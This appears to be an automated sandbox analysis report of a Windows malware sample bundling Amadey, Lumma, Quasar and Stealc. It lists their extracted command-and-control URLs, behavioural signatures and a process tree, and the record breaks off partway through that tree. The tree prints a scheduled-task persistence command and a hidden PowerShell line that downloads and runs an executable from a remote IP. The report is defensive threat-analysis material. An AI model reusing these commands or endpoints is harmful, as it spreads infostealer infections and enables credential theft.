Analysis
-
max time kernel
39s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
30/03/2025, 13:49
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
0be1d68cb52990f41a783f9b0aba5fc8
-
SHA1
7823839d432aad2877d8c2ef4f664b209cbc71ba
-
SHA256
a5b959ac59961099a0605032aad6ad96ed577cfe8283bab41acc1efc8a00a1e4
-
SHA512
5347dafacf19ef7437ad2730ecf7ab522b870779989e686d91e918ec3424cf35739e7ee32dca09d86894b3c783195c0c72e12ed70e6099f698efdfbbca8e71e4
-
SSDEEP
24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8a41u:mTvC/MTQYxsWR7a41
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://cosmosyf.top/GOsznj
https://byteplusx.digital/aXweAX
https://travewlio.shop/ZNxbHi
https://skynetxc.live/AksoPA
https://pixtreev.run/LkaUz
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://sparkiob.digital/KeASUp
https://appgridn.live/LEjdAK
https://navstarx.shop/FoaJSi
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://wxayfarer.live/ALosnz
https://oreheatq.live/gsopp
https://xcastmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://7targett.top/dsANGt
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
https://rodformi.run/aUosoz
https://esccapewz.run/ANSbwqy
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/9164-17982-0x00000000008B0000-0x0000000000D0E000-memory.dmp healer behavioral2/memory/9164-17983-0x00000000008B0000-0x0000000000D0E000-memory.dmp healer behavioral2/memory/9164-18081-0x00000000008B0000-0x0000000000D0E000-memory.dmp healer -
Healer family
-
Lumma family
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/916-17453-0x000000000D0B0000-0x000000000D0CA000-memory.dmp family_quasar behavioral2/memory/916-17452-0x000000000CF30000-0x000000000D084000-memory.dmp family_quasar -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4e34859d80.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7a9f3697b2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 23 3460 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 3460 powershell.exe 916 powershell.exe 4724 powershell.exe 12880 powershell.exe 5728 powershell.exe -
Downloads MZ/PE file 5 IoCs
flow pid Process 33 4088 rapes.exe 33 4088 rapes.exe 33 4088 rapes.exe 33 4088 rapes.exe 23 3460 powershell.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7a9f3697b2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7a9f3697b2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4e34859d80.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4e34859d80.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation A9cowK5.exe -
Executes dropped EXE 8 IoCs
pid Process 1432 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 4088 rapes.exe 5864 e35a1c1713.exe 1348 4e34859d80.exe 3520 rapes.exe 208 A9cowK5.exe 4500 EPTwCQd.exe 4900 7a9f3697b2.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 4e34859d80.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 7a9f3697b2.exe -
Loads dropped DLL 10 IoCs
pid Process 5040 MsiExec.exe 4232 rundll32.exe 4232 rundll32.exe 4232 rundll32.exe 4232 rundll32.exe 4232 rundll32.exe 4232 rundll32.exe 4232 rundll32.exe 4232 rundll32.exe 4232 rundll32.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000400000001e4ba-17620.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 1432 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 4088 rapes.exe 1348 4e34859d80.exe 3520 rapes.exe 4900 7a9f3697b2.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5864 set thread context of 3196 5864 e35a1c1713.exe 108 PID 4500 set thread context of 4596 4500 EPTwCQd.exe 121 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A9cowK5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7a9f3697b2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4e34859d80.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 12852 PING.EXE 9748 PING.EXE 8240 PING.EXE 7456 PING.EXE 4484 PING.EXE 1456 PING.EXE 4536 PING.EXE 11948 PING.EXE 10892 PING.EXE 9848 PING.EXE 12248 PING.EXE 11620 PING.EXE 10032 PING.EXE 12732 PING.EXE 10328 PING.EXE 10492 PING.EXE 4496 PING.EXE 7732 PING.EXE 12532 PING.EXE 1944 PING.EXE 9324 PING.EXE 8832 PING.EXE 5780 PING.EXE 6588 PING.EXE 10804 PING.EXE 8152 PING.EXE 11052 PING.EXE 1492 PING.EXE 9948 PING.EXE 8920 PING.EXE 7280 PING.EXE 11960 PING.EXE 3448 PING.EXE 5808 PING.EXE 6900 PING.EXE 12384 PING.EXE 8136 PING.EXE 7940 PING.EXE 7912 PING.EXE 4440 PING.EXE 9964 PING.EXE 7240 PING.EXE 12404 PING.EXE 10404 PING.EXE 13136 PING.EXE 11344 PING.EXE 8512 PING.EXE 7636 PING.EXE 12668 PING.EXE 6264 PING.EXE 9420 PING.EXE 8620 PING.EXE 11776 PING.EXE 10856 PING.EXE 7824 PING.EXE 6356 PING.EXE 12516 PING.EXE 856 PING.EXE 6164 PING.EXE 9604 PING.EXE 12264 PING.EXE 3452 PING.EXE 4524 PING.EXE 11372 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000d433842ca64169410000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000d433842c0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900d433842c000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dd433842c000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000d433842c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Kills process with taskkill 5 IoCs
pid Process 4836 taskkill.exe 7140 taskkill.exe 2592 taskkill.exe 4360 taskkill.exe 4916 taskkill.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 13072 reg.exe 13056 reg.exe -
Runs ping.exe 1 TTPs 64 IoCs
pid Process 10220 PING.EXE 8076 PING.EXE 6564 PING.EXE 6244 PING.EXE 11176 PING.EXE 11924 PING.EXE 9508 PING.EXE 7732 PING.EXE 7540 PING.EXE 7280 PING.EXE 11440 PING.EXE 4496 PING.EXE 13136 PING.EXE 11700 PING.EXE 8328 PING.EXE 7824 PING.EXE 10472 PING.EXE 10856 PING.EXE 10904 PING.EXE 3584 PING.EXE 10328 PING.EXE 9748 PING.EXE 8692 PING.EXE 7912 PING.EXE 7368 PING.EXE 12248 PING.EXE 8800 PING.EXE 1800 PING.EXE 11612 PING.EXE 10972 PING.EXE 11696 PING.EXE 12884 PING.EXE 11660 PING.EXE 11532 PING.EXE 6416 PING.EXE 11372 PING.EXE 10400 PING.EXE 8052 PING.EXE 6172 PING.EXE 6160 PING.EXE 12244 PING.EXE 10492 PING.EXE 6920 PING.EXE 4484 PING.EXE 5004 PING.EXE 12384 PING.EXE 11280 PING.EXE 4524 PING.EXE 6676 PING.EXE 9012 PING.EXE 8204 PING.EXE 12536 PING.EXE 12416 PING.EXE 7320 PING.EXE 11160 PING.EXE 12856 PING.EXE 8620 PING.EXE 12164 PING.EXE 6056 PING.EXE 9848 PING.EXE 7624 PING.EXE 11584 PING.EXE 11092 PING.EXE 7992 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1976 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 3460 powershell.exe 3460 powershell.exe 1432 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 1432 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 4088 rapes.exe 4088 rapes.exe 3196 MSBuild.exe 3196 MSBuild.exe 3196 MSBuild.exe 3196 MSBuild.exe 1348 4e34859d80.exe 1348 4e34859d80.exe 1348 4e34859d80.exe 1348 4e34859d80.exe 1348 4e34859d80.exe 1348 4e34859d80.exe 3520 rapes.exe 3520 rapes.exe 4596 MSBuild.exe 4596 MSBuild.exe 4596 MSBuild.exe 4596 MSBuild.exe 4900 7a9f3697b2.exe 4900 7a9f3697b2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3460 powershell.exe Token: SeDebugPrivilege 208 A9cowK5.exe Token: SeShutdownPrivilege 1508 msiexec.exe Token: SeIncreaseQuotaPrivilege 1508 msiexec.exe Token: SeSecurityPrivilege 6128 msiexec.exe Token: SeCreateTokenPrivilege 1508 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1508 msiexec.exe Token: SeLockMemoryPrivilege 1508 msiexec.exe Token: SeIncreaseQuotaPrivilege 1508 msiexec.exe Token: SeMachineAccountPrivilege 1508 msiexec.exe Token: SeTcbPrivilege 1508 msiexec.exe Token: SeSecurityPrivilege 1508 msiexec.exe Token: SeTakeOwnershipPrivilege 1508 msiexec.exe Token: SeLoadDriverPrivilege 1508 msiexec.exe Token: SeSystemProfilePrivilege 1508 msiexec.exe Token: SeSystemtimePrivilege 1508 msiexec.exe Token: SeProfSingleProcessPrivilege 1508 msiexec.exe Token: SeIncBasePriorityPrivilege 1508 msiexec.exe Token: SeCreatePagefilePrivilege 1508 msiexec.exe Token: SeCreatePermanentPrivilege 1508 msiexec.exe Token: SeBackupPrivilege 1508 msiexec.exe Token: SeRestorePrivilege 1508 msiexec.exe Token: SeShutdownPrivilege 1508 msiexec.exe Token: SeDebugPrivilege 1508 msiexec.exe Token: SeAuditPrivilege 1508 msiexec.exe Token: SeSystemEnvironmentPrivilege 1508 msiexec.exe Token: SeChangeNotifyPrivilege 1508 msiexec.exe Token: SeRemoteShutdownPrivilege 1508 msiexec.exe Token: SeUndockPrivilege 1508 msiexec.exe Token: SeSyncAgentPrivilege 1508 msiexec.exe Token: SeEnableDelegationPrivilege 1508 msiexec.exe Token: SeManageVolumePrivilege 1508 msiexec.exe Token: SeImpersonatePrivilege 1508 msiexec.exe Token: SeCreateGlobalPrivilege 1508 msiexec.exe Token: SeCreateTokenPrivilege 1508 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1508 msiexec.exe Token: SeLockMemoryPrivilege 1508 msiexec.exe Token: SeIncreaseQuotaPrivilege 1508 msiexec.exe Token: SeMachineAccountPrivilege 1508 msiexec.exe Token: SeTcbPrivilege 1508 msiexec.exe Token: SeSecurityPrivilege 1508 msiexec.exe Token: SeTakeOwnershipPrivilege 1508 msiexec.exe Token: SeLoadDriverPrivilege 1508 msiexec.exe Token: SeSystemProfilePrivilege 1508 msiexec.exe Token: SeSystemtimePrivilege 1508 msiexec.exe Token: SeProfSingleProcessPrivilege 1508 msiexec.exe Token: SeIncBasePriorityPrivilege 1508 msiexec.exe Token: SeCreatePagefilePrivilege 1508 msiexec.exe Token: SeCreatePermanentPrivilege 1508 msiexec.exe Token: SeBackupPrivilege 1508 msiexec.exe Token: SeRestorePrivilege 1508 msiexec.exe Token: SeShutdownPrivilege 1508 msiexec.exe Token: SeDebugPrivilege 1508 msiexec.exe Token: SeAuditPrivilege 1508 msiexec.exe Token: SeSystemEnvironmentPrivilege 1508 msiexec.exe Token: SeChangeNotifyPrivilege 1508 msiexec.exe Token: SeRemoteShutdownPrivilege 1508 msiexec.exe Token: SeUndockPrivilege 1508 msiexec.exe Token: SeSyncAgentPrivilege 1508 msiexec.exe Token: SeEnableDelegationPrivilege 1508 msiexec.exe Token: SeManageVolumePrivilege 1508 msiexec.exe Token: SeImpersonatePrivilege 1508 msiexec.exe Token: SeCreateGlobalPrivilege 1508 msiexec.exe Token: SeCreateTokenPrivilege 1508 msiexec.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1508 msiexec.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 5524 wrote to memory of 1688 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 5524 wrote to memory of 1688 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 5524 wrote to memory of 1688 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 5524 wrote to memory of 4568 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 5524 wrote to memory of 4568 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 5524 wrote to memory of 4568 5524 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 1688 wrote to memory of 1976 1688 cmd.exe 91 PID 1688 wrote to memory of 1976 1688 cmd.exe 91 PID 1688 wrote to memory of 1976 1688 cmd.exe 91 PID 4568 wrote to memory of 3460 4568 mshta.exe 94 PID 4568 wrote to memory of 3460 4568 mshta.exe 94 PID 4568 wrote to memory of 3460 4568 mshta.exe 94 PID 3460 wrote to memory of 1432 3460 powershell.exe 101 PID 3460 wrote to memory of 1432 3460 powershell.exe 101 PID 3460 wrote to memory of 1432 3460 powershell.exe 101 PID 1432 wrote to memory of 4088 1432 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 102 PID 1432 wrote to memory of 4088 1432 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 102 PID 1432 wrote to memory of 4088 1432 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 102 PID 4088 wrote to memory of 5864 4088 rapes.exe 106 PID 4088 wrote to memory of 5864 4088 rapes.exe 106 PID 5864 wrote to memory of 3196 5864 e35a1c1713.exe 108 PID 5864 wrote to memory of 3196 5864 e35a1c1713.exe 108 PID 5864 wrote to memory of 3196 5864 e35a1c1713.exe 108 PID 5864 wrote to memory of 3196 5864 e35a1c1713.exe 108 PID 5864 wrote to memory of 3196 5864 e35a1c1713.exe 108 PID 5864 wrote to memory of 3196 5864 e35a1c1713.exe 108 PID 5864 wrote to memory of 3196 5864 e35a1c1713.exe 108 PID 5864 wrote to memory of 3196 5864 e35a1c1713.exe 108 PID 5864 wrote to memory of 3196 5864 e35a1c1713.exe 108 PID 4088 wrote to memory of 1348 4088 rapes.exe 109 PID 4088 wrote to memory of 1348 4088 rapes.exe 109 PID 4088 wrote to memory of 1348 4088 rapes.exe 109 PID 4088 wrote to memory of 208 4088 rapes.exe 111 PID 4088 wrote to memory of 208 4088 rapes.exe 111 PID 4088 wrote to memory of 208 4088 rapes.exe 111 PID 208 wrote to memory of 1508 208 A9cowK5.exe 112 PID 208 wrote to memory of 1508 208 A9cowK5.exe 112 PID 208 wrote to memory of 1508 208 A9cowK5.exe 112 PID 6128 wrote to memory of 5040 6128 msiexec.exe 116 PID 6128 wrote to memory of 5040 6128 msiexec.exe 116 PID 6128 wrote to memory of 5040 6128 msiexec.exe 116 PID 5040 wrote to memory of 4232 5040 MsiExec.exe 117 PID 5040 wrote to memory of 4232 5040 MsiExec.exe 117 PID 5040 wrote to memory of 4232 5040 MsiExec.exe 117 PID 4088 wrote to memory of 4500 4088 rapes.exe 120 PID 4088 wrote to memory of 4500 4088 rapes.exe 120 PID 4500 wrote to memory of 4596 4500 EPTwCQd.exe 121 PID 4500 wrote to memory of 4596 4500 EPTwCQd.exe 121 PID 4500 wrote to memory of 4596 4500 EPTwCQd.exe 121 PID 4500 wrote to memory of 4596 4500 EPTwCQd.exe 121 PID 4500 wrote to memory of 4596 4500 EPTwCQd.exe 121 PID 4500 wrote to memory of 4596 4500 EPTwCQd.exe 121 PID 4500 wrote to memory of 4596 4500 EPTwCQd.exe 121 PID 4500 wrote to memory of 4596 4500 EPTwCQd.exe 121 PID 4500 wrote to memory of 4596 4500 EPTwCQd.exe 121 PID 4088 wrote to memory of 4900 4088 rapes.exe 124 PID 4088 wrote to memory of 4900 4088 rapes.exe 124 PID 4088 wrote to memory of 4900 4088 rapes.exe 124 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ySgTlmaKy2s /tr "mshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ySgTlmaKy2s /tr "mshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1976
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3460 -
